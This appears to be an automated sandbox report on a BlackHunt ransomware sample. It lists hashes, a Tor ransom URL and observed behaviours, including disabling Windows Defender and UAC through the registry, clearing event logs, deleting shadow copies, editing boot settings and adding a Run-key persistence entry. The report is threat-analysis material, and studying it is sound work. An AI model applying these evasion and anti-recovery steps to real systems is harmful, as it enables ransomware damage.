Analysis
-
max time kernel
122s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
19/01/2024, 00:43
Static task
static1
Behavioral task
behavioral1
Sample
bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe
Resource
win10v2004-20231215-en
General
-
Target
bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe
-
Size
707KB
-
MD5
1b3c8897d9c4a6dbf9e91de651b11e40
-
SHA1
95351d0ddbacdec4271aea1807bf16aa4db8cf72
-
SHA256
bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c
-
SHA512
f0987edbf2ffe395c203300ce9dc6248caafbf40f79e34377394958a33464d70e16e9cae2b8afe2761cd58bcb5ddecb44d30a44716865b107ff4b1bc5afd6e42
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1d8rvnh:6uaTmkZJ+naie5OTamgEoKxLWg7h
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 4348 fsutil.exe 2136 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 2592 wevtutil.exe 2232 wevtutil.exe 4324 wevtutil.exe 4332 wevtutil.exe 4372 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 2496 bcdedit.exe 444 bcdedit.exe 2224 bcdedit.exe 4132 bcdedit.exe -
Renames multiple (2890) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 2500 wbadmin.exe 4160 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Deletes itself 1 IoCs
pid Process 4208 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\E: bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\G: bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened (read-only) \??\L: bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened (read-only) \??\B: bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened (read-only) \??\R: bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened (read-only) \??\X: bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened (read-only) \??\N: bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\P: bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened (read-only) \??\W: bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened (read-only) \??\M: bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened (read-only) \??\Z: bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\U: bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened (read-only) \??\A: bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened (read-only) \??\S: bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened (read-only) \??\H: bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened (read-only) \??\J: bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened (read-only) \??\V: bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened (read-only) \??\Q: bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened (read-only) \??\T: bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened (read-only) \??\Y: bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened (read-only) \??\I: bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened (read-only) \??\K: bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened (read-only) \??\O: bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Javascripts\#BlackHunt_Private.key bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\#BlackHunt_Private.key bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File created C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\#BlackHunt_ReadMe.hta bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-core-kit.xml bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\locale\#BlackHunt_Private.key bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File created C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\#BlackHunt_Private.key bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File created C:\Program Files\VideoLAN\VLC\locale\da\#BlackHunt_Private.key bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\vimeo.luac bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\dtplugin\#BlackHunt_ReadMe.hta bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\#BlackHunt_ReadMe.hta bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File created C:\Program Files\VideoLAN\VLC\locale\zu\#BlackHunt_Private.key bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened for modification C:\Program Files\7-Zip\Lang\pt-br.txt bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File created C:\Program Files\VideoLAN\VLC\locale\hi\LC_MESSAGES\#BlackHunt_ReadMe.txt bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Nipigon bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Riyadh88 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-applemenu_ja.jar bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Rothera bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File created C:\Program Files\VideoLAN\VLC\locale\ga\#BlackHunt_ReadMe.hta bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationUp_ButtonGraphic.png bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\classlist bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File created C:\Program Files\VideoLAN\VLC\locale\tr\LC_MESSAGES\#BlackHunt_Private.key bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File created C:\Program Files\VideoLAN\VLC\plugins\video_output\#BlackHunt_Private.key bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\#BlackHunt_ReadMe.hta bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\#BlackHunt_ReadMe.hta bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File created C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\#BlackHunt_ReadMe.hta bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\#BlackHunt_ReadMe.txt bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\#BlackHunt_Private.key bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\rectangle_specialocc_Thumbnail.bmp bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-progress-ui.xml bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-4 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pt_BR\LC_MESSAGES\vlc.mo bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\HLS.api bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\#BlackHunt_Private.key bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\time-span-16.png bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\DumontDUrville bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\MANIFEST.MF bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Goose_Bay bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Yakutsk bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\feedbck2.gif bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-sampler.xml bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-modules-templates.xml_hidden bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_sv.properties bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Madrid bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File created C:\Program Files\DVD Maker\de-DE\#BlackHunt_ReadMe.hta bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\management-agent.jar bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.jdp_5.5.0.165303.jar bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-dialogs.jar bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-utilities_zh_CN.jar bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Jujuy bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File created C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\#BlackHunt_ReadMe.hta bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File created C:\Program Files\VideoLAN\VLC\locale\gu\LC_MESSAGES\#BlackHunt_ReadMe.txt bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\button-overlay.png bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\rectangle_postage_Thumbnail.bmp bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\#BlackHunt_ReadMe.txt bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File created C:\Program Files\VideoLAN\VLC\locale\mr\#BlackHunt_Private.key bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-favorites_ja.jar bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Chicago bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\specialmainsubpicture.png bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-autoupdate-services.xml bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe File opened for modification C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME.txt bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2560 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 4172 vssadmin.exe 2476 vssadmin.exe 628 vssadmin.exe 2792 vssadmin.exe 3024 vssadmin.exe 2744 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 3268 taskkill.exe -
Modifies registry class 8 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2012 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 4212 mshta.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 3040 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe Token: SeRestorePrivilege 3040 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe Token: SeBackupPrivilege 3040 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe Token: SeTakeOwnershipPrivilege 3040 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe Token: SeAuditPrivilege 3040 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe Token: SeSecurityPrivilege 3040 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe Token: SeIncBasePriorityPrivilege 3040 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe Token: SeBackupPrivilege 4028 vssvc.exe Token: SeRestorePrivilege 4028 vssvc.exe Token: SeAuditPrivilege 4028 vssvc.exe Token: SeBackupPrivilege 3616 wbengine.exe Token: SeRestorePrivilege 3616 wbengine.exe Token: SeSecurityPrivilege 3616 wbengine.exe Token: SeSecurityPrivilege 2592 wevtutil.exe Token: SeBackupPrivilege 2592 wevtutil.exe Token: SeSecurityPrivilege 2232 wevtutil.exe Token: SeBackupPrivilege 2232 wevtutil.exe Token: SeSecurityPrivilege 4332 wevtutil.exe Token: SeSecurityPrivilege 4324 wevtutil.exe Token: SeSecurityPrivilege 4372 wevtutil.exe Token: SeBackupPrivilege 4332 wevtutil.exe Token: SeBackupPrivilege 4324 wevtutil.exe Token: SeBackupPrivilege 4372 wevtutil.exe Token: SeDebugPrivilege 3268 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3040 wrote to memory of 2516 3040 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe 31 PID 3040 wrote to memory of 2516 3040 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe 31 PID 3040 wrote to memory of 2516 3040 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe 31 PID 3040 wrote to memory of 2516 3040 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe 31 PID 3040 wrote to memory of 2908 3040 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe 29 PID 3040 wrote to memory of 2908 3040 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe 29 PID 3040 wrote to memory of 2908 3040 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe 29 PID 3040 wrote to memory of 2908 3040 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe 29 PID 3040 wrote to memory of 2920 3040 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe 33 PID 3040 wrote to memory of 2920 3040 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe 33 PID 3040 wrote to memory of 2920 3040 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe 33 PID 3040 wrote to memory of 2920 3040 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe 33 PID 3040 wrote to memory of 2252 3040 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe 38 PID 3040 wrote to memory of 2252 3040 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe 38 PID 3040 wrote to memory of 2252 3040 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe 38 PID 3040 wrote to memory of 2252 3040 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe 38 PID 2516 wrote to memory of 2360 2516 cmd.exe 36 PID 2516 wrote to memory of 2360 2516 cmd.exe 36 PID 2516 wrote to memory of 2360 2516 cmd.exe 36 PID 3040 wrote to memory of 2572 3040 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe 35 PID 3040 wrote to memory of 2572 3040 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe 35 PID 3040 wrote to memory of 2572 3040 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe 35 PID 3040 wrote to memory of 2572 3040 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe 35 PID 3040 wrote to memory of 2624 3040 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe 40 PID 3040 wrote to memory of 2624 3040 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe 40 PID 3040 wrote to memory of 2624 3040 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe 40 PID 3040 wrote to memory of 2624 3040 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe 40 PID 2920 wrote to memory of 2652 2920 cmd.exe 42 PID 2920 wrote to memory of 2652 2920 cmd.exe 42 PID 2920 wrote to memory of 2652 2920 cmd.exe 42 PID 3040 wrote to memory of 2792 3040 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe 142 PID 3040 wrote to memory of 2792 3040 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe 142 PID 3040 wrote to memory of 2792 3040 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe 142 PID 3040 wrote to memory of 2792 3040 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe 142 PID 2908 wrote to memory of 2680 2908 cmd.exe 130 PID 2908 wrote to memory of 2680 2908 cmd.exe 130 PID 2908 wrote to memory of 2680 2908 cmd.exe 130 PID 3040 wrote to memory of 2780 3040 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe 135 PID 3040 wrote to memory of 2780 3040 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe 135 PID 3040 wrote to memory of 2780 3040 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe 135 PID 3040 wrote to memory of 2780 3040 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe 135 PID 3040 wrote to memory of 2564 3040 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe 48 PID 3040 wrote to memory of 2564 3040 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe 48 PID 3040 wrote to memory of 2564 3040 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe 48 PID 3040 wrote to memory of 2564 3040 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe 48 PID 3040 wrote to memory of 2928 3040 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe 132 PID 3040 wrote to memory of 2928 3040 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe 132 PID 3040 wrote to memory of 2928 3040 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe 132 PID 3040 wrote to memory of 2928 3040 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe 132 PID 3040 wrote to memory of 2520 3040 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe 57 PID 3040 wrote to memory of 2520 3040 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe 57 PID 3040 wrote to memory of 2520 3040 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe 57 PID 3040 wrote to memory of 2520 3040 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe 57 PID 3040 wrote to memory of 2460 3040 